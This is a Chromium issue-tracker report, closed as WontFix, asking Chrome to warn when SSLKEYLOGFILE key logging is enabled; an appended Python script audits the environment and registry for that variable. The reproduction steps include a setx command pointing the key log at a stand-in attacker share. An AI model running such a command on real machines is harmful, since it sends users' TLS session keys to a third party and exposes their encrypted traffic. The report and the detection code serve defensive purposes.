Issue 804473

Starred by 2 users

Issue metadata

Status: WontFix
Owner: ----
Closed: Jan 2018
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 2
Type: Feature




Chrome should show a warning when SSLKEYLOGFILE tracing enabled

Reported by bkhow...@gmail.com, Jan 22 2018

Issue description

UserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36

Steps to reproduce the problem:
1. Setx SSLKEYLOGFILE \\attacker\shr\allyourkeys [/m]
2. use chrome
3. attacker has all your keys

What is the expected behavior?
The browser UI should notify the user that all his keys are being logged to the attacker's server (or user's own debug directory, etc).

What went wrong?
The capability to log TLS premaster keys to SSLKEYLOGFILE is a critical debugging capability, and highly useful for analyzing captures with Wireshark. However, the browser UI should provide visual feedback to the user to notify/remind them that they are logging all TLS key material. In the case of a malicious attacker who manages to set a system or user environment variable, the user would have no indication that the confidentiality of his sessions has been compromised. The browser is displaying "Secure" when it in fact is writing the keys somewhere.

Did this work before? No 

Chrome version: 63.0.3239.132  Channel: stable
OS Version: 10.0
Flash Version: 

Possibly this feature should not exist in the mainstream version of Chrome; for example, it is disabled in the Tor Browser.
 
Components: Internals>Network>SSL
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Feature
Status: Untriaged (was: Unconfirmed)
Summary: Chrome should show a warning when SSLKEYLOGFILE tracing enabled (was: Address bar should show a warning when SSLKEYLOGFILE tracing enabled)
Reclassifying as a feature request.

An attacker with the ability to control your browser's execution environment can perform all manner of attacks.
https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#Why-arent-compromised_infected-machines-in-Chromes-threat-model
Status: WontFix (was: Untriaged)
Given that we don't treat --log-net-log as a security critical flag either, and given the Chrome Security FAQ, I'm marking WontFix/WorkingAsIntended.
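
A defender-side check for the condition this issue describes, added here as an example (not code from Chromium or from the reporter): it reports whether SSLKEYLOGFILE is set in the process environment or in the registry locations where `setx` persists variables, and flags UNC destinations. The function names and the unset/local/remote classification are assumptions of this example.

```python
import os
import sys
from pathlib import PureWindowsPath

VAR = "SSLKEYLOGFILE"
# Registry locations where setx persists user and machine-wide (/m) variables.
REG_SCOPES = {
    "user": ("HKEY_CURRENT_USER", r"Environment"),
    "machine": ("HKEY_LOCAL_MACHINE",
                r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment"),
}

def classify(value):
    """Return 'unset', 'local' or 'remote' for an SSLKEYLOGFILE value."""
    if not value or not value.strip():
        return "unset"
    # A UNC path (\\host\share\...) parses with a drive of the form \\host\share.
    # Mapped network drives (e.g. Z:) are not resolved here and count as 'local'.
    if PureWindowsPath(value.strip()).drive.startswith("\\\\"):
        return "remote"
    return "local"

def read_scopes():
    """Collect the variable from this process and, on Windows, from the registry."""
    found = {"process": os.environ.get(VAR)}
    if sys.platform == "win32":
        import winreg
        for scope, (hive, key) in REG_SCOPES.items():
            try:
                with winreg.OpenKey(getattr(winreg, hive), key) as k:
                    found[scope] = winreg.QueryValueEx(k, VAR)[0]
            except OSError:  # key or value not present
                found[scope] = None
    return found

def audit(values):
    """Map each scope to (classification, value); anything not 'unset' needs review."""
    return {scope: (classify(v), v) for scope, v in values.items()}

if __name__ == "__main__":
    for scope, (kind, value) in audit(read_scopes()).items():
        print(f"{scope:8} {kind:7} {value or ''}")
```

On a workstation where nobody is deliberately capturing TLS keys for debugging, every scope should report `unset`; a `remote` result means key material is being written off the machine.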
